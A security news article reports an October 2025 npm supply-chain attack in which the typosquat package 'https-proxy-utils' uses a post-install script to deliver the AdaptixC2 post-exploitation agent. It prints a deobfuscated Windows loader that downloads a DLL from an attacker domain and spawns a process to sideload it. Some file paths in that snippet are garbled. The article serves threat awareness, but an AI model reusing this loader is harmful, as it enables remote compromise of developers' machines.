The emergence of the AdaptixC2 post-exploitation framework in 2025 marked a significant milestone in the evolution of attacker toolsets targeting open-source supply chains.
Positioning itself as a formidable alternative to established tools like Cobalt Strike, AdaptixC2 quickly attracted threat actors seeking agility and stealth in post-exploitation scenarios.
This October, researchers uncovered its delivery through the npm package registry—a supply chain attack targeting developers and organizations reliant on Node.js modules for critical infrastructure and application development.
The incident revolved around a deceptive npm package named https-proxy-utils, which mimicked the functionality and naming conventions of widely used legitimate libraries such as http-proxy-agent.
The threat actors cloned proxy-related features from popular modules, ensuring the malicious package appeared both useful and harmless.
Upon installation, however, the package executed a post-install script designed to download and deploy the AdaptixC2 agent onto the victim’s system, initiating a stealthy foothold for remote access and broader exploitation.
Securelist researchers were the first to identify and analyze the AdaptixC2 npm infection, noting both the technical sophistication of the attack and its alarming implications for open-source threat landscapes.
As the npm ecosystem grows, attackers are increasingly exploiting its trust and wide reach. The discovery highlights the persistent risk posed by supply chain attacks, emphasizing the need for vigilant vetting and continuous monitoring of open-source components.
Infection Mechanism: OS-Specific Adaptation
A standout feature of the AdaptixC2 npm campaign is its tailored infection strategy for multiple operating systems. Once the malicious package executes, it detects the host OS and deploys the payload using methods designed for Windows, macOS, or Linux.
For Windows, the code sideloads the agent as a DLL alongside a legitimate executable, using JavaScript scripting to spawn the compromised process.
%20and%20legitimate%20(right)%20packages%20(Source%20-%20Securelist).webp "Threat Actors Leverage npm Ecosystem to Deliver AdaptixC2 Post-Exploitation Framework 3")
Below is a deobfuscated snippet employed for Windows deployment:-
async function onWindows() {
const url="https://cloudcenter.topsysupdate";
const dllPath="C:\.dll";
const systemMsdtc="C:\32.exe";
const tasksMsdtc="C:\.exe";
try {
await downloadFile(url, dllPath);
fs.copyFileSync(systemMsdtc, tasksMsdtc);
const child = spawn(tasksMsdtc, [], { detached: true, stdio: 'ignore' });
child.unref();
} catch (err) {
console.error(err);
}
}This flexible approach extends across macOS and Linux systems, employing autorun configuration and architecture-specific binary delivery to ensure persistent control.
Such OS-targeted infection routines deepen the framework’s ability to evade conventional detection, broadening its scope for exploitation across diverse environments.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
